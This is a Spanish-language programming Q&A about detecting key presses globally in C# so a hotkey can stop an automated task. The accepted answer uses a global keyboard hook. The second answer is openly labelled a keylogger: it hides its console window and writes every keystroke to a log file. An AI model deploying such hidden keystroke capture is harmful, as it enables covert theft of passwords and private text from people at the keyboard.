# Leer teclado en todas partes c#

Tags: c#

estoy haciendo un programa el cual necesito quiero hacer que se pare cuando presionas una tecla, hasta aquí todo correcto, el problema viene cuando no estoy en el programa y estoy en otro, he usado el evento KeyDown.

```
private void button1_KeyDown(object sender, KeyEventArgs e)
{
     MessageBox.Show("has presionado una tecla");
}
```

Ejemplo: Estoy en word haciendo una tarea automatizada y quiero pararla, para ello quiero presionar el botón pero no funcionaría por que no estoy en el programa.

Comment: Tu idea viene mas o menos hacer un programa espia de teclado.

Comment: Mi idea es que al presionar una tecla pare un proceso y que cuando le vuelvas a dar lo vuelva a ejecutar

Comment: Creo que podrias hacer un servicio e instalarlo como servicio de windows para que escuche tu presion de teclas. Lo podrias hacer con wcf e instalarla como servicios de windows. Es lo que se me ocurre rapidamente.

Comment: Lo miraré, si lo consigo podré la solución aquí

Answer (score 0, accepted):

Esta a sido la solución que he usado:

Usando el archivo `GlobalKeyBoardHook.cs` que lo puedes encontrar en internet y este es el código

```
GlobalKeyboardHook macro = new GlobalKeyboardHook();

private void Form1_Load(object sender, EventArgs e)
{
      macro = new GlobalKeyboardHook();
      macro.KeyDown += new KeyEventHandler(macro_keyDown);
      foreach (Keys key in Enum.GetValues(typeof(Keys)))
          macro.HookedKeys.Add(key);
}

public void macro_keyDown(object sender, KeyEventArgs e)
{
      textBox1.Text += ((char)e.KeyValue).ToString();
 }


private void button1_Click(object sender, EventArgs e)
{
    macro.hook();            
}

private void button2_Click(object sender, EventArgs e)
{
    macro.unhook();            
}
```

`hook()` --> Iniciar para escuchar
`unhook()` --> Parar de escuchar

Aquí todo lo que escribas se añadirá al textbox, puedes filtrar de manera que solo ejecute la función `macro_keyDown` si pulsas una tecla y para ello tienes que ir al `foreach` y poner `Keys.Space` donde `Space` sería la tecla que tu quieres filtrar

Answer (score 1):

El siguiente es un programa keylogger, como verás es una consola, comentado he dejado la función dónde podrías evaluar el key presionado.

Para evaluar podrías utilizar el enumerador System.ConsoleKey, o directamente el Key.

```
class Program
{
    private const int WH_KEYBOARD_LL = 13;
    private const int WM_KEYDOWN = 0x0100;
    private static LowLevelKeyboardProc _proc = HookCallback;
    private static IntPtr _hookID = IntPtr.Zero;
    static void Main(string[] args)
    {
        var handle = GetConsoleWindow();


        ShowWindow(handle, SW_HIDE);

        _hookID = SetHook(_proc);
        Application.Run();
        UnhookWindowsHookEx(_hookID);

    }
    private static IntPtr SetHook(LowLevelKeyboardProc proc)
    {
        using (Process curProcess = Process.GetCurrentProcess())
        using (ProcessModule curModule = curProcess.MainModule)
        {
            return SetWindowsHookEx(WH_KEYBOARD_LL, proc,
                GetModuleHandle(curModule.ModuleName), 0);
        }
    }

    private delegate IntPtr LowLevelKeyboardProc(
    int nCode, IntPtr wParam, IntPtr lParam);

    private static IntPtr HookCallback(
        int nCode, IntPtr wParam, IntPtr lParam)
    {
        if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
        {

           //la variable vkCode recupera el valor del char presionado
           //es aquí donde podrás evaluar la tecla, recordar que un char es un ascii            
            int vkCode = Marshal.ReadInt32(lParam);



            Console.WriteLine((Keys)vkCode);
            StreamWriter sw = new StreamWriter("c:\\temp\\log.txt", true);


            sw.Write((Keys)vkCode);
            sw.Close();
        }
        return CallNextHookEx(_hookID, nCode, wParam, lParam);
    }



    [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    private static extern IntPtr SetWindowsHookEx(int idHook,
        LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);

    [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool UnhookWindowsHookEx(IntPtr hhk);

    [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode,
        IntPtr wParam, IntPtr lParam);

    [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    private static extern IntPtr GetModuleHandle(string lpModuleName);



    [DllImport("kernel32.dll")]
    static extern IntPtr GetConsoleWindow();

    [DllImport("user32.dll")]
    static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);

    const int SW_HIDE = 0;
}
```